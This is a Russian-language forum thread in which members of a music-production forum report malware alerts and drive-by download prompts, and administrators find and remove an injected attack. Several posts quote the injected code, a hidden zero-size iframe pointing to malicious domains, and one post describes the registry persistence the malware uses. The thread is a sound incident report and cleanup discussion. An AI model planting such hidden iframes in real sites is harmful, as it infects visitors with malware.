Ахтунг, на форуме вирус (1 онлайн

Rusik

Руслан Бащенко
20 Июн 2007
2.063
845
113
53
Украина, Киев
brmusic.org.ua
У меня Каспер перестал ругаться сегодня... до этого тож выдавал отэту "булле-какую-то" ерунду...))) Причем ругался и в IE, и в опере...)
 

PS+

тут я, зайко, тут...
31 Май 2009
661
181
43
Обратите внимание, пользователь заблокирован на форуме.
надо же... а я и не знал о таких происшествиях,- уж сколько дней захаживаю))
IE8, Symantec EP 11 x64
 

tarzan

Administrator
Команда форума
10 Ноя 2002
9.317
3.509
113
77
Москва
В коде на главной есть такая строка

<div class="smallfont"><iframe src=http://bulletcool.net/? width=0 height=0></iframe></div>
 

Kokarev Maxim

Барыга от искусства
13 Май 2007
5.673
5.008
113
44
Барнаул
recording-studio.ru
Угу, айфрейм на главной есть: <div class="smallfont"><iframe src=http://plannadess.net/? width=0 height=0></iframe></div>

При первом заходе у меня Опера ругается на отсутствующий плагин Acrobat.
 

Alexandr C

Свободный художник
12 Май 2005
401
59
28
Пермь
После того, как в файле hosts забанил bulletcool.net, пару дней заходило нормально. СЕгодня снова-здорова.

С утречка попытка установить какую то хрень.
В систем32 появляется инородный екзешник: C:\WINDOWS\system32\ZK7gOVq.exe
(удалил)

Теперь прописал в hosts - plannadess.net.

Чего дальше делать будем? Ждать следующего адреска для заполнения в hosts?
 

PS+

тут я, зайко, тут...
31 Май 2009
661
181
43
Обратите внимание, пользователь заблокирован на форуме.
а вообще-то...
у меня ж тут престранный случай был вчера утром.
значит, ставил я себе пианинки 4 новые... ну тут же для сравнения веса открыта была папка со старой библой АР... ну там IE8 (возможно, с RMM), pdf, word, C5, ещё несколько папок и всякая мелочь...
ставилась последняя библа, работаю в ворде, и вдруг чую: тормозец нарастает... на диспетчере в трее - норма... не понял... а на память-то глянул,- фаак!.. 98% (из 8 гб)
я в шоке, давай быстрее сохранять ворд, всё тормозит... закрываю все приложения, как во сне (когда бежишь, а ноги, как ватные)... гляжу в диспетчер: кто отжирает память? оказывается, SONAR (не путать с секвенсором, которого нету),- это превентив от Symantec Endpoint Protection 11 x64.
тут я закрываю папку со старой пианиной АР, и память падает в норму...
но не в пианине же дело... конечно, нет,- после сего происшествия (к слову, выдержанного Семёркой на ура!.. не упала) перестала работать эта самая превентивная защита... а это - трояны и прочая муть... так и написано в Симантеке: выключена, т.к. устарела,- обновите... но неоднократное обновление не помогало,- дату обновки пишет свежую, а не включает, и всё... исправлял, изменял - бесполезно... хорошо, у Симантека чёткое удаление (вчистую),- удалил, переставил, обновил,- работает:sun_bespectacled:
 
Последнее редактирование:

Al Soloviev

Well-Known Member
18 Июн 2008
1.255
907
113
У меня вчера все эксплореры-файрфоксы парализовало, пока не восстановил систему позавчерашним днем. теперь работает. Ничего не качал, не устанавливал... все думал либо рммюзик, либо сайт местных мамок... похоже рммюзик
 

smack

Well-Known Member
3 Май 2008
22.202
27.641
113
www.youtube.com
У меня тоже аваст заблокировал РММ, пришлось заходить через "задний крыльцо"...

Сегодня все нормально.

П.С. Браузер - лисичка.
 

P00H

New Member
12 Мар 2004
8.192
2.789
0
58
Moscow
завтра Крапан появится и объяснит в чём там дело

з.ы. у меня вообще никаких чёта скачать или открыть ниразу не предлогалось, правда все iframe у меня отключены.
 

Ga_rY

Мучитель-синтезаторов
2 Янв 2008
1.324
802
113
62
Полтава, UA
www.realmusic.ru
Второй или третий день уже идет блокировка RMM с таким окном

Avira со свежими базами, браузер Google Chrom
 

serj33music

جميل
4 Мар 2008
1.444
387
83
Україна
Надо что-то решать !!! Сколько уже дней прошло ? Сколько еще ждать ? :nea:

Зачем париться еще про вирусы - когда хочешь просто зайти на форум ??? :training1:
 

Shico

(Шико)
10 Фев 2005
1.195
255
83
62
У меня Лиса 3.6 и Kаспер 10-ый, ничего такого про что здесь пишут не наблюдал ни разу...
 

RockMeister

Banned
19 Авг 2008
8.142
4.691
113
Три-четыре дня подряд Авира ругается, когда вхожу на Rmmedia:

XP SP3, Opera 10.01, Avira Antivir Personal.
 

buncker

=)
26 Ноя 2002
10.307
4.770
113
45
МО
у меня поднялся акробат и сожрал полторагига памяти по-быстрому....

ка-то это не гуд.
 

tarzan

Administrator
Команда форума
10 Ноя 2002
9.317
3.509
113
77
Москва
В коде страницы такой iframe:

<div class="smallfont"><iframe src=http://plannadess.net/? width=0 height=0></iframe></div>

вопрос: это нормально?
 

Krapan

Administrator
Команда форума
17 Дек 2007
2.275
1.650
113
41
Вирус зачистим, нечего панику наводить, вирус не смертельный

в ближайшее время будем обновлять форум, потому что в текущем есть уязвимости через которые и был вставлен iframe код
 

Krapan

Administrator
Команда форума
17 Дек 2007
2.275
1.650
113
41
нет это было связано с другим делом, сервер делал бэкап баз данных и подвис, происходит это с пятницы, сегодня обновили дальше будем смотреть
 
  • Like
Реакции: konion

Krapan

Administrator
Команда форума
17 Дек 2007
2.275
1.650
113
41
вирус зачистили, просьба сообщать обо всех подобных проишествиях прямиком мне в личку или на мыло krapan гав rmmedia.ru
 

Alexey Lukin

Well-Known Member
11 Июн 2003
1.985
1.461
113
43
audio.rightmark.org
Снова при заходе на форум предлагается к загрузке PDF с сайта hттp://amutsorr.in
Но на этот раз загрузка не начинается автоматически, и до открытия Акробата дело не доходит.
 

Mrbro

iBrom
15 Окт 2006
277
288
63
amutsorr.in
whitehouse.gov

ребятки, юзайте Firefox в связке с no-script и ни одна левая зараза не пролезет )
 

Alex Borg

Well-Known Member
13 Июн 2006
936
402
63
59
EU
www
Подтверждаю вирус сидит! Только что подцепил. Благо знаю как его убрать. Убейте пожалуйста этот вирус-для тех кто не знает как _http://forum.kaspersky.com/index.php?showtopic=157821&pid=1266297&st=0&
Вирус на заражённом компе прописывается в system32 - см. по дате(там появляется несколько exe файлов и в реестре HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon-Userinit"="c:\\windows\\system32\\userinit.exe, после строчки userinit.exe, какой-то исполнительный файл(в норм. системе после запятой ничего не должно быть) проверить можно утилитой HiJackThis
PS:На прошлой неделе убил мне два компа. AVG определял но ничего не смог сделать. Avira его вообще в упор не видит. Если-бы не 100% загрузка процесса explorer.exe и сегодна Acr.exe врядли бы так быстро разобрался.
 

Biochrome

label manager, promotion
27 Мар 2009
160
24
0
39
Tallinn, Estonia
www.d-labproject.com
на маке конечно мне не страшно, но вот сегодня залез через винду на ноутбуке с AVG и он ругнулся на главной странице, плюс GoogleChrome предлагал какой-то жизненоважный плагин, без которого сайт будет отображаться неправильно...
 

axis

Well-Known Member
18 Апр 2005
4.723
3.256
113
46
Kaniv, UA
а мне предлагает загрузить и установить JAVA - отменяю и все.
 

Сейчас онлайн (Пользователей: 0, Гостей: 1)